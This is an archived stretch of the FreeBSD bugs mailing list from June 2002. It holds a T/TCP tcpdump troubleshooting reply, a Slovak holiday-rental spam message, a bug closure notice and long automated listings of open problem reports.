(Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article you write: >>Description: >I tested the T/TCP by using the source code in 3> on FreeBsd 4.5. The tcpdump result as below: > >09:49:10.957632 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: >SFP 3873691517:3873691817(300) win 65535 (DF) > >09:49:10.957748 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: >S 2495134045:2495134045(0) ack 3873691518 win 65535 nop, cc 8, nop,nop,ccecho 7> > >09:49:10.957782 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: >F 301:301(0) ack 1 win 65535 (DF) > >09:49:10.957834 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: >ack 1 win 65535 (DF) > >09:49:11.950539 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: >FP 1:301(300) ack 1 win 65535 (DF) > >09:49:11.950578 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: >ack 302 win 65535 (DF) > >09:49:11.950750 dhcp189.tor.qobra.net.1028 > dhcp189.tor.qobra.net.1026: >FP 1:401(400) ack 302 win 65535 (DF) > >09:49:11.950768 dhcp189.tor.qobra.net.1026 > dhcp189.tor.qobra.net.1028: >ack 402 win 65535 (DF) > >The client sent 300 bytes to server, and server reply 400 bytes to >client. It seems that step 4 and 5 are wrong, but I don't know why. I >set rfc1644 on(1) and rfc1323 off(0), why step 4 sends wrong ACK and >step 5 resend the message to server. I'm not sure why step 3 (sending a bare FIN) is present. However, otherwise, the transaction above looks correct; the syncache will only ACK the SYN, and not the rest of the data in the packet, so the data needs to be retransferred. TCP Accelerated Open only applies to the second connection seen from a machine; the first connection will always undergo the standard 3way handshake, since it needs to cache the connection count. You can see this in the first connection because 'ccnew' is present, not 'cc'. Do further connections fome the machine still exhibit this behavior? -- Jonathan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 10:11:55 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from smtp1.nx.nextra.sk (smtp1.nx.nextra.sk [195.168.1.108]) by hub.freebsd.org (Postfix) with SMTP id 00AB837B405 for ; Mon, 24 Jun 2002 10:11:41 -0700 (PDT) Received: (qmail 5623 invoked from network); 24 Jun 2002 17:11:03 -0000 Received: from unknown (HELO p4) (195.168.79.72) by 0 with SMTP; 24 Jun 2002 17:11:03 -0000 Message-ID: <001f01c21ba2$45a21fe0$484fa8c3@p4> From: =?iso-8859-2?Q?August=EDn_Kacl?= To: Subject: x4 R e l a x Date: Mon, 24 Jun 2002 17:43:13 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0012_01C21BA6.9D68B000" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C21BA6.9D68B000 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable Nevyhovuje V=E1m dovolenka pri mori ? Str=E1vte ju v hor=E1ch v = zdravom prostredi. Aj na Slovensku sa d=E1 prezit kr=E1sna a pohodov=E1 = dovolenka. Rekreacne pobyty pre rodiny s de=BBmi (10 osob+2 pristelky), = ako aj pre zamestnancov roznych firiem a organiz=E1cii, pon=FAkame v = nadstandardnej v=FDbave a kvalite, kde uspokoj=EDme aj t=FDch = n=E1rocnejs=EDch. Rekreacn=FD dom ALEXANDRA v lokalite M A R T I N S K = =C9 H O L E - Str=E1ne, v peknom horskom prostred=ED, d=E1vaj=FA = predpoklad k maxim=E1lnej spokojnosti a opatovn=FDch n=E1vratov k n=E1m. Ak V=E1s t=E1to inform=E1cia zaujala, doporucujeme navst=EDvit web = str=E1nku: www.chataalexandra.host.sk , kde sa dozviete vsetky = potrebn=E9 inform=E1cie o objekte a okol=ED, ako aj kontaktn=E9 = telef=F3ny a adresu. Pre organiz=E1cie, ktor=E9 dok=E1zu vytazit tento = objekt poskytneme v=FDrazn=FA zlavu az do v=FDsky 30 % z uv=E1dzan=FDch = cien. Objekt je vhodn=FD aj pre mensie skolenia a kurzy, rodinn=E9 = oslavy, ako aj na rekreacn=E9 pobyty pre zamestnancov firiem a = organiz=E1cii z prostriedkov tvoren=FDch v soci=E1lnom fonde v zmysle = z=E1k. 152/94 Zz. Z=E1roven sa ospravedlnujeme za to, ze sme si = dovolili poslat k Vasej pozornosti tento e-mail. Pokial by V=E1s to = obta=BEovalo a prek=E1zalo V=E1m to, tak n=E1m to l=E1skavo dajte na = vedomie, aby sme V=E1s z adres=E1ra vymazali.=20 =20 Za pochopenie dakujeme a tes=EDme sa na stretnutie ! =20 August=EDn Kacl --- Odch=E1dzaj=FAca spr=E1va neobsahuje v=EDrusy. Skontrolovan=E9 antiv=EDrusov=FDm syst=E9mom AVG = (http://www.grisoft.cz). Verzia: 6.0.370 / V=EDrusov=E1 datab=E1za: 205 - d=E1tum vydania: = 5.6.2002 ------=_NextPart_000_0012_01C21BA6.9D68B000 Content-Type: text/html; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable
    Nevyhovuje = V=E1m dovolenka=20 pri mori ? Str=E1vte ju v hor=E1ch v zdravom prostredi. Aj na = Slovensku sa d=E1 prezit=20 kr=E1sna a pohodov=E1 dovolenka. Rekreacne pobyty pre rodiny s de=BBmi = (10 osob+2=20 pristelky), ako aj pre zamestnancov roznych firiem a organiz=E1cii, = pon=FAkame v=20 nadstandardnej v=FDbave a kvalite, kde uspokoj=EDme aj t=FDch = n=E1rocnejs=EDch. =20 Rekreacn=FD dom ALEXANDRA v=20 lokalite M A R T I N S K =C9  H O L E - Str=E1ne, v = peknom=20 horskom prostred=ED, d=E1vaj=FA predpoklad k maxim=E1lnej spokojnosti a = opatovn=FDch=20 n=E1vratov k n=E1m.

    Ak V=E1s t=E1to = inform=E1cia zaujala,=20 doporucujeme navst=EDvit web str=E1nku: www.chataalexandra.host.sk= , kde sa=20 dozviete vsetky potrebn=E9 inform=E1cie o objekte a okol=ED, ako aj = kontaktn=E9 telef=F3ny=20 a adresu. Pre organiz=E1cie, ktor=E9 dok=E1zu vytazit tento objekt = poskytneme=20 v=FDrazn=FA zlavu az do v=FDsky 30 % z uv=E1dzan=FDch cien. Objekt=20 je
vhodn=FD aj pre mensie = skolenia a kurzy,=20 rodinn=E9 oslavy, ako aj na rekreacn=E9 pobyty=20 pre zamestnancov firiem a organiz=E1cii z prostriedkov tvoren=FDch v=20 soci=E1lnom fonde v zmysle = z=E1k. 152/94=20 Zz.  Z=E1roven sa ospravedlnujeme za to, ze sme si dovolili poslat k Vasej = pozornosti=20 tento e-mail. Pokial by V=E1s to obta=BEovalo a prek=E1zalo V=E1m to, = tak n=E1m to l=E1skavo=20 dajte na vedomie, aby sme V=E1s z adres=E1ra vymazali.=20
   =20
    Za = pochopenie dakujeme a=20 tes=EDme sa na stretnutie=20 !
   =20
    August=EDn=20 Kacl
 

---
Odch=E1dzaj=FAca = spr=E1va neobsahuje=20 v=EDrusy.
Skontrolovan=E9 antiv=EDrusov=FDm syst=E9mom AVG (http://www.grisoft.cz).
Verzia: = 6.0.370 /=20 V=EDrusov=E1 datab=E1za: 205 - d=E1tum vydania:=20 5.6.2002
------=_NextPart_000_0012_01C21BA6.9D68B000-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 10:28:42 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65FEA37B401; Mon, 24 Jun 2002 10:28:38 -0700 (PDT) Received: (from mckusick@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OHScP74249; Mon, 24 Jun 2002 10:28:38 -0700 (PDT) (envelope-from mckusick) Date: Mon, 24 Jun 2002 10:28:38 -0700 (PDT) From: Message-Id: <200206241728.g5OHScP74249@freefall.freebsd.org> To: chris@aims.com.au, mckusick@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/39762: ffs_softdep_stub.c has wrong function definitions Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ffs_softdep_stub.c has wrong function definitions State-Changed-From-To: open->closed State-Changed-By: mckusick State-Changed-When: Mon Jun 24 10:27:59 PDT 2002 State-Changed-Why: The suggested patch was applied which resolved the problem. http://www.freebsd.org/cgi/query-pr.cgi?pr=39762 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 11: 0:18 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EE2F837B403 for ; Mon, 24 Jun 2002 11:00:09 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OI09d78075 for freebsd-bugs@freebsd.org; Mon, 24 Jun 2002 11:00:09 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 24 Jun 2002 11:00:09 -0700 (PDT) Message-Id: <200206241800.g5OI09d78075@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: open PR's (mis)filed to gnats-admin and in limbo Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports Critical problems Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [2002/06/23] pending/39753gnats-adminFlashteroids (attack of the butts!) o [2002/06/24] pending/39786gnats-adminRe:%20ports/34105:%20New%20port%3A%20audi 2 problems total. Non-critical problems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 11: 7: 8 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2760F37B410 for ; Mon, 24 Jun 2002 11:00:20 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5OI0BI78139 for freebsd-bugs@freebsd.org; Mon, 24 Jun 2002 11:00:11 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 24 Jun 2002 11:00:11 -0700 (PDT) Message-Id: <200206241800.g5OI0BI78139@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The problem is understood and a solution is being sought. f - feedback Further work requires additional information from the originator or the community - possibly confirmation of the effectiveness of a proposed solution. p - patched A patch has been committed, but some issues (MFC and / or confirmation from originator) are still open. s - suspended The problem is not being worked on, due to lack of information or resources. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested -- or when fixing the problem is abandoned. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- f [1998/05/13] kern/6630 phk [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/11/25] kern/8861 mdodd under heavy (multi interface) traffic ep0 o [1999/05/31] kern/11966 ru TCP copies send and receive socket buffer s [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch f [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C f [1999/12/05] kern/15281 Please fix handling Ross(?) host to PCI b o [2000/01/17] misc/16157 green "fire" screensave kills network performan o [2000/02/14] kern/16708 wpaul 3Com 3c900-Combo Ehternet card make kerne o [2000/02/18] i386/16802 An user math program have the system on K o [2000/03/15] i386/17391 jhb FreeBSD boot loader does not recognize ke o [2000/03/27] kern/17620 jhay Digi/570i sync driver (if_ar.c) causes sy f [2000/03/28] alpha/17642 alpha FreeBSD/alpha 4.0 RELEASE installation fa o [2000/05/09] misc/18466 dillon install via nfs or ftp media silently tru o [2000/05/17] misc/18641 paul FreeBSD V4.0 crashes when using ifconfig f [2000/05/29] kern/18874 peter 32bit NFS servers export wrong negative v o [2000/06/13] kern/19247 uthread_sigaction.c does not do anything o [2000/06/14] misc/19257 Detection of connected ports on a Cyclom o [2000/07/12] gnu/19882 obrien ld does not detect all undefined symbols! o [2000/07/30] i386/20308 yokota vidcontrol VESA_800x600 causes a kernel p f [2000/07/31] kern/20310 groudier Symbios 53c875j drivers don't work o [2000/08/05] kern/20429 yokota setting flags 0x1 in atkbd0 locks keyboar o [2000/08/08] i386/20495 yokota 4.1-STABLE and 4.1-RELEASE: keyboard does o [2000/08/28] kern/20895 groudier sym driver doesn't work for SYM53C895A o [2000/09/04] misc/21025 msmith BTX loader 1.00 gets 1Gb of memory from B f [2000/09/04] i386/21042 mdodd Keyboard driver problems with PS/2 Model o [2000/09/12] kern/21220 msmith mlx0: I/O error - attempt to write beyond o [2000/09/14] kern/21272 wpaul USB interrupts seem to be turned off o [2000/09/14] kern/21278 gibbs ahc driver wedges on stressed SMP system o [2000/11/01] kern/22494 wpaul Fatal trap 12: page fault while in kernel f [2000/11/02] kern/22557 fatal kernel trap 0x2(memory management) f [2000/11/03] bin/22595 brian telnetd tricked into using arbitrary peer o [2000/11/18] kern/22953 keu driver throws 'usb error on rx: IOERR o [2000/11/20] gnu/22972 obrien Internal Compiler Error o [2000/11/25] misc/23103 standards lacks many ISO C99 features (NAN f [2000/11/27] i386/23145 brian pppoe-test-program panics the server o [2000/11/29] kern/23173 read hangs in linux emulation f [2000/12/09] kern/23411 SMP Kernel Freezes Machines on Dual Proce a [2000/12/14] kern/23547 msmith only one logical device on Mylex AcceleRA f [2000/12/14] i386/23548 4.x causes Thinkpad 560X disk to spin up/ o [2001/01/17] kern/24418 read/write in thread library (-lc_r) does s [2001/01/30] kern/24740 cy filesystem corruption CFP1080 CAM SCSI ca f [2001/02/20] kern/25235 OS Hungs up when using with a Battery of f [2001/02/23] i386/25328 4.x stable kernel crash: page fault f [2001/02/27] misc/25407 Error while booting 4.2 : ahc0 Signaled A o [2001/03/09] kern/25632 n_hibma USB modem (umodem) may destroy the cfreel o [2001/03/20] kern/25950 obrien Bad drives on asr look zero-length and pa o [2001/03/24] kern/26048 obrien 4.3-RC: SMP and asr driver don't work to f [2001/03/30] kern/26223 Linux /compat/linux/dev devices doesn't w o [2001/04/02] bin/26305 mjacob Cannnot restore partions with FreeBSD 4.x o [2001/04/13] kern/26549 IPsec policies for more than one pair of f [2001/04/20] i386/26736 System freeze booting from (i386) 4.3 flo f [2001/04/25] kern/26840 dillon process doing mmap() over nfs hangs in vm o [2001/05/02] ports/27036 sobomax All Ports using Mesa3 are required with - f [2001/05/02] i386/27042 4.3-RELEASE installation from CDROM fails f [2001/05/02] kern/27048 Bus support (I believe) broken in freeBSD f [2001/05/03] kern/27059 groudier (symbios) SCSI subsystem hangs under heav a [2001/05/10] kern/27250 bp unionfs filesystem panics in large number o [2001/05/11] kern/27275 kernel bug ? f [2001/05/17] conf/27408 rc.network hangs at rpc.umntall if stale o [2001/06/07] bin/27939 rlogin uses wrong IP address for remote h o [2001/06/08] kern/27985 Recent -STABLE crashes when accessing dc f [2001/06/09] kern/27987 sos New ATA Driver failure with VIA Southbrid a [2001/06/09] i386/27991 ssh 1 and 2 login with keys is not possib o [2001/06/09] bin/28002 ru SHARED=symlinks is broken o [2001/06/25] kern/28402 kernel panic caused by softupdates (may b o [2001/06/27] kern/28465 Enabling softupdates on a clean but activ o [2001/06/27] kern/28466 When soft updates is enabled, cpl is not o [2001/06/30] i386/28550 Boot: Fatal Trap 12: page fault while in f [2001/06/30] i386/28558 makedev return non-zero status after inst o [2001/07/02] kern/28630 Look like hung up a kernel after few minu f [2001/07/04] kern/28703 dillon Kernel reboot during tape backup of nfs m o [2001/07/05] kern/28751 n_hibma USB Mouse doesn't seem to work! o [2001/07/14] kern/28966 pirzyk math libraries in linux emulation do not o [2001/07/14] kern/28974 PPPoE software fails when SOCK_RAW employ o [2001/07/15] ports/28995 max deMime produces blank line in header part f [2001/07/17] i386/29045 Heavy disk usage causes panic in ffs_blkf o [2001/07/21] kern/29121 msdos fs causes kernel panic when writing o [2001/07/24] bin/29191 NFS file locking fails from Solaris 8 cli o [2001/07/24] misc/29200 dcs Syntax errors in /boot/device.hints cause o [2001/08/14] conf/29699 Setting NO_MAILWRAPPER results in a syst o [2001/08/15] kern/29742 PCCARD Modems don't work on cardbus bridg o [2001/08/15] kern/29743 TI-1450 interrupt storm o [2001/08/18] kern/29844 setpgrp does not behave as manual says o [2001/08/18] kern/29847 n_hibma USB usbd_probe_and_attach() is broken and o [2001/09/03] kern/30300 -current hang caught and crash-dump'd. o [2001/09/04] ports/30331 portmgr Conflict between bsd.port.mk MAKEFILE var o [2001/09/09] i386/30458 Workstation sometimes hangs when connecte f [2001/09/12] i386/30527 does not like scsi on atrend 6260 dual PI o [2001/09/19] i386/30670 4.3 and 4.4 mfsroot floppies reboot Dell o [2001/09/20] i386/30693 On new install bootup does endless usb0: f [2001/09/21] i386/30705 msmith Installation fails on system with Mylex A o [2001/09/23] kern/30771 Panic when mounting drive a [2001/09/24] i386/30802 gibbs repeat of i386/22760. Adaptec SCSI contro o [2001/09/27] bin/30869 dump does not dump all files of a filesys o [2001/09/29] kern/30921 ACER mechanic ps/2 keyboard don╢t work an o [2001/09/30] ports/30935 taoka pips sc880 - needs to have syvr4 support o [2001/10/01] i386/30961 On lsdev -> error & BTX halted =( o [2001/10/04] kern/31042 murray Device name conflict o [2001/10/12] kern/31233 Kernel panics after upgrading to 4.4-STAB o [2001/10/13] ports/31254 obrien I cannot compile Java src files using gcj o [2001/10/14] misc/31266 System can be crashed with "ls -al /flopp o [2001/10/15] bin/31304 joe fix crunchgen to work with more contrib-k o [2001/10/17] conf/31327 Fixes and improvements for rc.diskless* s o [2001/10/24] kern/31468 Spontaneous crashes, possible related to o [2001/10/25] kern/31493 BTX halted with big disk and 4.4R f [2001/10/31] i386/31671 4.4 installer hangs at " Mounting root fr o [2001/11/02] kern/31710 kernel reboots; looks like an unintended o [2001/11/03] i386/31728 Install hangs on: (debug screens last wri o [2001/11/12] ports/31948 steve open-motif: having USE_MOTIF in /etc/make o [2001/11/16] bin/32040 brian 4.4-Release "set mtu" in ppp is broken wi f [2001/11/20] i386/32127 Proliant 1600 kernel panics after SMP is o [2001/11/22] kern/32184 Kernel crashes in ufs code o [2001/11/23] i386/32237 4.4-RELEASE keyboard doesnt work after bo f [2001/11/30] kern/32418 silby kernel table full o [2001/12/04] ports/32506 des Apache mod_auth_pam doesn't works o [2001/12/11] kern/32713 usb mouse detaches from hub and doesnt re o [2001/12/11] ports/32714 kde KDE build failure: Qt's uic core dumps o [2001/12/12] alpha/32757 alpha fatal kernel trap using generic kernel fo o [2001/12/14] i386/32830 FreeBSD 4.4 install fails on Thinkpad 750 a [2001/12/14] kern/32831 sos HP Colorado IDE tape drive get wedged eas o [2001/12/16] bin/32895 imp rebooting between Win98SE and 4.4-2001121 a [2001/12/22] i386/33089 murray GENERIC bloat causes 'make world' to brea o [2001/12/25] misc/33169 system freeze after cron daily security c o [2001/12/27] misc/33261 dwmalone FreeBSD base system does not install tcpd o [2001/12/27] gnu/33262 mp gdb does not handle pending signals corre o [2001/12/30] docs/33345 doc pnpinfo not finding info for pnp pci mode f [2002/01/04] misc/33567 RELENG_4 won't makeworld; bsd.dep.mk, Mak o [2002/01/05] i386/33574 kernel hangs on page fault during boot pr f [2002/01/07] kern/33637 dillon Panic: vm_page_unwire: invalid wire count o [2002/01/07] bin/33670 dwmalone default inetd install allows for unlimite f [2002/01/08] misc/33688 Downloading some files with ftp hangs the o [2002/01/14] ports/33887 kris security/snort port cannot find its rule o [2002/01/16] kern/33951 pthread_cancel is ignored o [2002/01/16] kern/33952 Bogus error message from correct phreads o [2002/01/16] kern/33970 random freeze on IDE Raid 0 (Highpoint HP o [2002/01/17] misc/33997 Reboot Fails on Server o [2002/01/17] i386/34018 response to request from ipv6 client does o [2002/01/18] bin/34028 brian userland ppp o [2002/01/18] i386/34051 Install menu crashes o [2002/01/19] kern/34067 n_hibma Reproducable crash on usb ugen o [2002/01/19] kern/34071 pcn-driver is sort-of-broken in 4.5RC2 (a a [2002/01/21] ports/34123 mharo sudo coredumps on ^C in password prompt & o [2002/01/21] i386/34144 installation,mounting root from ufs:/dev/ o [2002/01/25] bin/34274 green 4.5-RC Interoperability issue: sshd o [2002/01/27] ports/34357 portmgr ports needs a resume function. f [2002/01/30] kern/34447 DLink DFE 500 rev E1 + dhclient dc0 crash o [2002/01/30] kern/34470 bde Modem gets sio1 interrupt-level buffer o o [2002/01/31] bin/34502 ssh can crash the 4.5 system f [2002/02/03] i386/34576 cannot load freebsd o [2002/02/06] ports/34669 www "download" links in WWW ports listing are o [2002/02/06] kern/34680 Kernel panics when checking-out a tree (d o [2002/02/07] kern/34711 frequent system stall under moderate scsi o [2002/02/15] i386/34977 IPFW UID/GID Based Filtering doesn't work o [2002/02/18] kern/35082 IBM Intellistation will not reboot with S o [2002/02/18] i386/35096 Network card dies copying files > 200MB w o [2002/02/20] misc/35150 FreeBSD 4.5 won't install ... out of inod o [2002/02/20] misc/35151 High NFSD load in FreeBSD 4.5R f [2002/02/26] kern/35354 4.4/4.5 FreeBSD causes hard lock after 20 o [2002/02/28] kern/35435 danny rl driver generates large amount of colli o [2002/03/01] kern/35466 xe driver can not read CIS tuples o [2002/03/06] i386/35615 sound ES1978 Maestro 2E sound card locks up mac o [2002/03/09] docs/35723 doc le(4) page doesn't warn about likely syst o [2002/03/09] i386/35726 Won't let me use ifconfig on the interfac f [2002/03/14] i386/35902 Right after i configure the ip settings, o [2002/03/15] i386/35950 ACPI missing prevents install from floppi o [2002/03/19] kern/36095 cd9660_vfsops.c: cd9660_vget_internal() k o [2002/03/20] kern/36149 kernel panic with option PPP_DEFLATE for o [2002/03/23] kern/36228 hw.ata.tags=1 does not work o [2002/03/25] kern/36313 ATA disk not bootable anymore after cvsup o [2002/03/26] i386/36342 rl/dc(smc) + ppppoe = major bug ! o [2002/03/27] kern/36384 Rushen local broken up f [2002/03/27] bin/36400 netstat crashes when trying to display AF o [2002/03/27] ports/36404 security-officerAcrobat Reader seems to link against zlib o [2002/03/29] kern/36504 dillon crash/panic vm_object_allocate under file a [2002/03/30] kern/36532 sos ar_buf because it is too short, it makes o [2002/03/30] kern/36539 installing a SIGCHLD handler makes libc_r o [2002/03/30] kern/36549 sym driver fails on Tekram DC-390U in 486 o [2002/04/07] i386/36850 Page Fault using ppp with USB Modem o [2002/04/10] ports/36964 portmgr cvsupit from www.freebsd.org is out of da o [2002/04/10] kern/36970 kernel cannot root device, ar0s1a on boot o [2002/04/12] kern/37015 Kernel panic in tty_subr.c while using pp o [2002/04/14] kern/37056 usb mouse with bios legacy support on han o [2002/04/14] kern/37060 sos kernel panic with hw.ata.tags=1 in ata-di o [2002/04/14] kern/37064 System hangs when removing wire of NIC D- o [2002/04/14] i386/37086 kernel trap 12 o [2002/04/16] kern/37144 panic: biodone: Zero vnode ref count ... o [2002/04/18] i386/37225 boot loader problem f [2002/04/18] ports/37241 ports character ranges in regular expressions i o [2002/04/19] ports/37249 kde kdevelop 2.0.2 doesn't compile in ports o [2002/04/19] kern/37257 SMP 4.5 freezes o [2002/04/20] ports/37300 portmgr Mk/bsd.ports.mk: fix broken USE_PYTDISTUT o [2002/04/24] bin/37435 des xdm SIGABRTs after rev 1.3 of etc/pam.d/x o [2002/04/26] bin/37498 buildworld fails due to /usr/src/lib/libc o [2002/04/28] ports/37524 glewis java_vm left in memory after exiting mozi o [2002/04/28] ports/37533 portmgr Manuals specified MLINKS is not available o [2002/04/28] ports/37535 kde Many KDE3 applications are nearly pitch b o [2002/04/29] kern/37581 Onboard AC97 - channel dead o [2002/04/30] kern/37606 ru genmask, rt_fixchange causes kernel panic o [2002/05/01] kern/37624 USB devices: 82801CA/CAM give error with o [2002/05/03] ports/37724 dirk (re)installing mod_php4 makes httpd dump o [2002/05/07] kern/37831 Half of buffer gets filled with silence w o [2002/05/10] kern/37929 silby hang of vr interface running at 100 MBit/ o [2002/05/12] i386/38016 i386_get_ldt range checking bug o [2002/05/12] i386/38021 i386_set_ldt can be cheated o [2002/05/13] kern/38029 Kernel panic in lockmgr o [2002/05/13] bin/38058 brian ppp alters IP header length field 40 -> 4 o [2002/05/14] kern/38070 4.6-PRERELEASE panics on resume on Fujits o [2002/05/15] kern/38107 Panic on nullfs a [2002/05/17] ports/38196 trevor domain name transition: sut.ac.jp -> tus. o [2002/05/18] i386/38223 fix vm86 bios call crash bug (updated) o [2002/05/19] kern/38285 Memory leak in kernel (proc-args) o [2002/05/20] alpha/38356 alpha 4.5-RELEASE src/sys tree on the alpha arc o [2002/05/21] ports/38394 kde qt-2.3.1 does not build o [2002/05/23] conf/38456 pccard.conf is not valid for IO DATA CDP- o [2002/05/23] i386/38459 Intel SB82558B NIC won't initialize prope o [2002/05/23] kern/38473 src address in ipv4 hdr for multicast pac o [2002/05/23] i386/38484 probe freeze o [2002/05/24] conf/38518 combination of pr-27087 and pr-36911 (2) o [2002/05/26] ports/38589 glimmer has been slapped together and sum a [2002/05/26] gnu/38594 Fortan program don't link post gcc-3.1 o [2002/05/28] misc/38672 ifconfig+alias o [2002/05/28] bin/38676 change request for pw command o [2002/05/29] i386/38698 Kernel panics when filesystem with snapsh o [2002/05/29] misc/38721 HPT372 fixes have not propagated down to o [2002/05/29] kern/38726 Linksys EtherFast 10/100 PCMCIA card reco o [2002/05/30] misc/38748 FreeBSD 4.5 Keyboard problem cannot insta o [2002/05/31] i386/38775 Kernel panic with ATA raid o [2002/06/02] kern/38840 when i pass data over my dialup connectio o [2002/06/03] kern/38848 kernel panic when removing memory stick f o [2002/06/03] misc/38867 Boot "Read error" with offboard Promise u o [2002/06/03] kern/38872 nfs code ignores possibility of MGET(M_WA o [2002/06/04] kern/38909 kernel panic in lockmgr...with invalid pi o [2002/06/06] i386/38944 problems with ed-driver and dlink dfe-650 o [2002/06/07] ports/39008 dwhite py-kqueue wrapper broken with python 2.2 o [2002/06/08] kern/39043 Corrupted files on a FAT32 partition f [2002/06/09] ports/39073 gnome gnome install compile from the /usr/ports f [2002/06/10] conf/39139 4.4 multi boot loader causes serious dam o [2002/06/11] ports/39152 dima acroread4 dumps core with linux7 o [2002/06/13] i386/39234 SMP 4.6-RC freezes during boot (Fujitsu-S o [2002/06/14] kern/39297 Have random panic somewhere near console o [2002/06/15] misc/39341 ppp + USB modem problem o [2002/06/15] docs/39343 doc Obsolete sysctls in manpage for ata(4) o [2002/06/15] misc/39346 kenv is in /usr/bin rather than in /bin - p [2002/06/16] misc/39377 freopen() in libc_r does not append o [2002/06/19] kern/39524 smbfs with nge NIC causes kernel panic o [2002/06/19] i386/39548 sos ata problems with FreeBSD 4.6 p [2002/06/19] kern/39549 maestro3 driver causes page fault in kern o [2002/06/19] kern/39553 FreeBSD-4.6 halt on SMP machine o [2002/06/19] alpha/39560 alpha unaligned access in wihap_input_data ( wi o [2002/06/20] i386/39586 "BTX halted" hile attempting 4.6 install o [2002/06/24] ports/39780 ports mcrypt port fails. Something about host o [2002/06/24] ports/39781 ports pdflib (as part of mod_php4) doesn't comp 255 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- s [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable a [1997/04/01] bin/3170 sheldonh vi freaks and dump core if user doesn't e f [1997/05/04] i386/3502 mdodd Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f f [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/12] kern/4284 paul le0 goes OACTIVE after some time o [1997/08/22] bin/4357 bug in adduser script causes duplicate UI s [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/16] kern/4782 dillon Under certain conditions, several krsh's o [1998/01/27] kern/5587 des session id gets 